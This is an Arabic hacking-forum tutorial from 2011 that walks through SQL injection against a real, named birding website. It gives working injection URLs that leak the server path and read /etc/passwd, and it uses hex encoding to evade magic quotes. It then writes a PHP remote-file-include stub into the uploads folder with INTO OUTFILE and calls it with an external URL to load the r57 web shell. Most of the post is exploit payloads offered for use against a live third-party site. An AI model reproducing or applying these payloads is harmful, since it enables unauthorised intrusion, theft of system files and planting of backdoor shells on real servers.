عرض مشاركة واحدة
قديم 02-01-2011, 09:33 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي رفع shell عن طريق الحقن


السلام عليكم ورحمة الله وبركاته

كيفكم ياشباب الليوم انا جايب لكم .....



شرح رفع shell عن طريق الحقن



الموقع الهدف


http://www.travellingbirder.com


المسار المصاب


http://www.travellingbirder.com/trip...ort.php?id=206


الاعمدة = 20


http://www.travellingbirder.com/trip...16,17,18,19,20


لازم نعرف مسارنا باللوحة وهذي لها طريقتين

الطريقة الاولى : من خطأ الاستعلام نفسه


http://www.travellingbirder.com/trip....php?id=206%27


رسالة الخطا


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/travellingbirder.com/public_html/tripreports/view_birding_tripreport.php on line 9


هذا هو المسار : /var/www/travellingbirder.com/public_html/tripreports/


طيب فرضا ما طلع لنا المسار في رسالة الخطأ .. وش نسوي


نسوي الطريقة الثانية وهي قراءة ملف passwd الموجود بمجلد etc لكن مو في كل الاوقات ينقرا لكن

لو تبي تعرف كيف تقرأ الملفات بشكل عام تابع الشرح أنا راح احاول قراءة

/etc/passwd

v

v

v

بعد ما عرفنا المسار نتحقق من الـ magic cotes انها غير مفعلة ( off) باستخدام دالة

load_file('/PATH/FILE')


http://www.travellingbirder.com/trip...,9,10,11,12,13,load_file('/etc/passwd'),15,16,17,18,19,20


ظهر لنا خطأ وهذا يعني انها مفعلة magic cotes = ON


كنا أول نقول اترك الموقع و دور غيره .. لكن الحين انا جبت لكم طرق تجربوها ممكن تنفع يعني نبقى اطول فترة ممكنة في الحقن (ممكن تنجح وممكن لا ) .. انا منزل الموضوع للفائدة ..



نروح لبرنامج CODER و نشفر المسار بالـ HEX

http://www.4shared.com/get/eLdOMF64/..._by_coder.html


أو نشفره CHAR()باستخدام اضافة الـ HACKBAR للـ FIREFOX

https://addons.mozilla.org/en-US/firefox/addon/3899/



انا افضل التشفير بالـ HEX


طبعا احنا راح نشفر الجزء هذا من الاستغلال

'/etc/passwd'


تشفيره بالـ HEX = 272F6574632F70617373776427


ننسخه ونلصقه مع بعض التعديلات


load_file(0x272F6574632F70617373776427)


مسحنا علانات التنصيص ..لاننا شفرناها مع المسار و حطينا

0x

قدام قيمة الهكس


نشوف كيف صار الاستغلال


http://www.travellingbirder.com/trip...,9,10,11,12,13,load_file%280x272F6574632F70617373776427%29,15,16,17,18,19,20


زال الخطأ .. لوووول

لكن .. ماطلعت محتويات الملف :(


الحين حلينا المشكلة .. خلونا نكمل الشرح حتى رفع الشيل


الحين احنا نبي نسوي ثغرة RFI

Remote File Include


هذا هو كود الثغرة


<?include("$rfi"); ?>


المتغير المصاب هو rfi


نحطها مكان

load_file(0x272F6574632F70617373776427)


بهذا الشكل


“<?include("$rfi"); ?>”

نشفرها

0x223C3F696E636C75646528222472666922293B203F3E22

ونروح لنهاية الاستغلال ونكتب

into+outfile+'path/777/myfile.*'

path = مسارنا ع الموقع
777 = مجلد مصرح 777 ( طبعا أحيانا ماينفع ... وتحط الملف اللي تبيه (لازم يكون ملف جديد ) مباشرة بعد المسار)
myfile.* = ملف جديد وبالامتداد اللي يعجبك

نشوف مجلد تصريحه 777


المواقع اللي فيها صور او ملفات غالبا يكون مكان رفعها مصرح بـ 777 كي يتمكن مدير الموقع من الرفع .. اذا الطريقة سهلة جدا


نروح لاقرب صورة أو ملف و click يمين ونختار properties او view image info

او اي شي يوصلك لمكان الصورة او الملف


انا حصلت صورة و طلعت مرفوعة في مجلد اسمه uploads


الحين تمام .. نعرف المسار .. و نعرف مجلد مصرح 777 بقي الملف .. نحط اسم أي ملف من راسنا أنا بأخليه deva.php


into+outfile+'/var/www/travellingbirder.com/public_html/tripreports/uploads/deva.php'

لازم تبعد الاعمدة اللي ظاهرة في الخطا مع العمود اللي انت شغال عليه و هذا يكون انك تستبدلها بـ null

ويصير الرابط النهائي .. هكذا


http://www.travellingbirder.com/trip...UNION+SELECT+1,null,3,null,null,null,null,null,null,10,11,12,13,0x223C3F696E636C75646528222472666922293B203F3E22,15,null,17,18,19,20+into+outfile+'/var/www/travellingbirder.com/public_html/tripreports/deva.php'


للاسف طلع لي خطأ .. وهذي المشكلة ما تنحل وكثيرا ما تواجهك لان اصلا نادرة المواقع اللي تغلق الماجيك كوتس .. لانك لو تقول نشفر المسار بالهكس اقول ما يضبط لان الهكس راح يعتبر انه هوه اسم الملف ..



نفترض انه مشى معنا وما طلع الخطا .. في هذي الحالة .. نروح لرابط اللف اللي سويناه


http://www.travellingbirder.com/trip...loads/deva.php


لو طلع رسالة مكتوب فيها error 404


يعني الملف ما انشئ وهنا نعرف ان الماجيك كوتس منعته .. ونجر أذيال الهزيمة .. :(

ونروح ندور ثغرة ثانية أو نكمل الحقن ونجيب اليوزر والباس واللوحة ونرفع الشل من اللوحة إذا ممكن


أما لو ما جانا error 404 يعني ان الملف تم انشاؤه بنجاح نروح نستغل تغرة RFI هكذا


http://www.travellingbirder.com/trip...oads/deva.php?rfi=http://saldiri.org/r57.txt?



deva.php = الملف المصاب اللي سويناه

rfi = المتغير المصاب اللي سويناه

http://saldiri.org/r57.txt = موقع مرفوع عليه شيل خام بصيغة txt

? = دالة تشغيل ملف php لازم تكتب بنهاية الرابط وإلا ما راح يعمل معك الشيل


وكذا انهينا الشرح ..


ملاحظات ::::


اولا جرب الاوامر العادية قبل ما تشفر .. ولو نتج لك خطأ في هذي الحالة شفر الاوامر


ثانيا المسار اللي يجي بعد دالة into outfile '' لايشفر أبدا لو ظهر لك خطا اترك الطريقة هذي ولو ما ظهر الخطا هذا يعني انه تم انشاء الملف بنجاح


ثالثا لو ظهر لك أعمدة أخرى مع العمود المصاب اجعلها null وإلا ستكتب في الملف مع كود الثغرة وتخرب عليك شغلك


عشان كذا كان استغلالي هكذا


http://www.travellingbirder.com/trip...ports/deva.php'


بالنسبة لعرض محتويات الملفات اللي طلبناها بدالة

load_file('/path/file')


لازم يكون العمود اللي نختاره عمود نصي .. يعني يجي مكان نص مكتوب


لو كان عمود لعرض صورة فلن تظهر المعلومات ..فقط يختفي الخطأ


.. وسلامتكم ..

الشرح للاخ المحترم
The DeVaStAtOr



vtu shell uk 'vdr hgprk

التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 

   

رد مع اقتباس